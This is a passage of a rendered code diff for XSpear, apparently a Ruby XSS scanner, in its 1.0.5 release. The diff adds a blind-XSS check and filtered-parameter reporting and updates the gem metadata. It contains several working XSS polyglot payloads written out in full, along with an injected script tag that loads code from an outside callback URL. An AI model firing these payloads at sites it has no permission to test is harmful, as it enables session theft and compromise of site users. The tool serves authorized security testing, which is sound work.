r.push makeQueryPattern('x', 'jaVasCript:/*-/*`/*\`/*\'/*"/**/(/* */oNcliCk=alert(45) )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert(45)//>\x3e', '\'"><svg/onload=alert(45)>', 'v', "triggered "+"XSS Polyglot payload".red, CallbackXSSSelenium)
|
|
274
304
|
r.push makeQueryPattern('x', 'javascript:"/*`/*\"/*\' /*</stYle/</titLe/</teXtarEa/</nOscript></Script></noembed></select></template><FRAME/onload=/**/alert(45)//--><<sVg/onload=alert`45`>', '\'"><svg/onload=alert(45)>', 'v', "triggered "+"XSS Polyglot payload".red, CallbackXSSSelenium)
|
|
275
305
|
r.push makeQueryPattern('x', 'javascript:"/*\'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*<svg/*/onload=alert(45)//>', '\'"><svg/onload=alert(45)>', 'v', "triggered "+"XSS Polyglot payload".red, CallbackXSSSelenium)
|
|
306
|
+
|
|
307
|
+
# Check Blind XSS Payload
|
|
308
|
+
if !@blind_url.nil?
|
|
309
|
+
payload = "<script src=#{@blind_url}></script>"
|
|
310
|
+
r.push makeQueryPattern('f', "\"'>#{payload}", "NOTDETECTED", 'i', "", CallbackNotAdded)
|
|
311
|
+
end
|
|
312
|
+
|
|
276
313
|
r = r.flatten
|
|
277
314
|
r = r.flatten
|
|
278
315
|
log('s', "test query generation is complete. [#{r.length} query]")
|
|
@@ -291,6 +328,8 @@ class XspearScan
|
|
|
291
328
|
if result[0]
|
|
292
329
|
log(node[:category], (result[1]).to_s.yellow+"[param: #{node[:param]}][#{node[:desc]}]")
|
|
293
330
|
@report.add_issue(node[:category],node[:type],node[:param],node[:query],node[:pattern],node[:desc])
|
|
331
|
+
elsif node[:callback] == CallbackNotAdded
|
|
332
|
+
@filtered_objects[node[:param].to_s].nil? ? (@filtered_objects[node[:param].to_s] = [node[:pattern].to_s]) : (@filtered_objects[node[:param].to_s].push(node[:pattern].to_s))
|
|
294
333
|
else
|
|
295
334
|
log('d', (result[1]).to_s)
|
|
296
335
|
end
|
|
@@ -299,6 +338,8 @@ class XspearScan
|
|
|
299
338
|
end
|
|
300
339
|
end.each(&:join)
|
|
301
340
|
end
|
|
341
|
+
|
|
342
|
+
@report.set_filtered @filtered_objects
|
|
302
343
|
@report.set_endtime
|
|
303
344
|
log('s', "finish scan. the report is being generated..")
|
|
304
345
|
if @output == 'json'
|
metadata
CHANGED
|
@@ -1,14 +1,14 @@
|
|
|
1
1
|
--- !ruby/object:Gem::Specification
|
|
2
2
|
name: XSpear
|
|
3
3
|
version: !ruby/object:Gem::Version
|
|
4
|
-
version: 1.0.
|
|
4
|
+
version: 1.0.5
|
|
5
5
|
platform: ruby
|
|
6
6
|
authors:
|
|
7
7
|
- hahwul
|
|
8
8
|
autorequire:
|
|
9
9
|
bindir: exe
|
|
10
10
|
cert_chain: []
|
|
11
|
-
date: 2019-07-
|
|
11
|
+
date: 2019-07-22 00:00:00.000000000 Z
|
|
12
12
|
dependencies:
|
|
13
13
|
- !ruby/object:Gem::Dependency
|
|
14
14
|
name: colorize
|
|
@@ -157,7 +157,6 @@ files:
|
|
|
157
157
|
- LICENSE.txt
|
|
158
158
|
- README.md
|
|
159
159
|
- Rakefile
|
|
160
|
-
- XSpear-1.0.3.gem
|
|
161
160
|
- XSpear.gemspec
|
|
162
161
|
- bin/console
|
|
163
162
|
- bin/setup
|
data/XSpear-1.0.3.gem
DELETED
|
Binary file
|